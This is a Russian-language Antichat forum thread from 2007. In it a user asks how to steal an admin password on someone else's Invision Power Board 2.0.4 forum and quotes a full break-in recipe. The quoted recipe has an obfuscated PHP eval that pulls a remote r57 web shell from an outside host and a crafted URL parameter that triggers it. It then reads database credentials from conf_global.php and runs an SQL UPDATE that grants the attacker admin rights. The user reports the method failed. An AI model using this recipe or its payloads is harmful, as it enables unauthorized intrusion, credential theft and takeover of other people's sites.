ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Взлом форума ipb версии 2.0.4.
  #1  
Старый 25.12.2007, 23:11
Аватар для Dark Smalville
Dark Smalville
Новичок
Регистрация: 18.12.2007
Сообщений: 1
Провел на форуме:
6105

Репутация: 0
Unhappy Взлом форума ipb версии 2.0.4.

Мне нужно угнать пароль админа на одном форуме.
Попытался использовать это:
http://hack-expo.void.ru/groups/partizans/txt/showthread.htm
Все делаю правильно,только появляется секунд через 5 надпись [failed].Я читал,что эта надпись означает,что форум пропатчен.
Пробовал другой способ:
Цитата:
Для форумов 2.0.0 - 2.1.5 1. Регистрируемся. 2. Отправляем сообщение : eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); // (это загрузит шелл) 3. Идем в поиск. Вводим свой ник в форму "Фильтр по имени пользователя" . Ставим галку "Результаты в виде сообщений". Ищем. 4. Вставляем в конец URL- адреса &lastdate=z|eval.*?%20//)%23e%00 . Должен загрузиться шелл. 5. В конце поля "Редактировать файл" вводим /conf_global.php . Сохраняем строчки: $INFO['sql_database'] = 'имя_базы'; $INFO['sql_user'] = 'логин_админа'; $INFO['sql_pass'] = 'пароль_админа'; 6. Возвращаемся назад. 7.Спускаемся вниз. Наводим мышку на наш ник. видим "...showuser=наш_id" Запоминаем наш_id 8. Раздел "Выполнение SQL запроса" . Вводим в поле "база" имя_базы , "Логин" логин_админа , "Пароль" пароль_админа. Заместо " SHOW DATABASES; SELECT * FROM user; SELECT version(); select user(); " вводим UPDATE `ibf_members` SET `mgroup`=4 WHERE `id` =наш_id; 9. Входим в админку. Теперь мы администратор.
Ага.Ничего опять не получается.Делал все так,как надо,но поиск работает нормально.

Другие способы взлома есть?
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом форумов IPB (Invision Power Board) < 2.0.4 Ice_Fro$T Форумы 19 18.11.2006 09:19
Как с форума IPB 2.0.4 вытянуть "соль" ? Diablo Форумы 8 09.02.2006 20:47
Взлом форумов IPB версии < 2.0.4 Ice_Fro$T Форумы 16 29.12.2005 12:22
А нафига публиковать инфу о том как ломать чаты. Егорыч+++ Чаты 52 14.11.2005 20:23
Возвожно ли защитить форум IPB 2.0.4 Trial или IPB 1.3 final от взлома эксплоитом? CTTAPTAK Форумы 1 10.10.2005 21:46



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ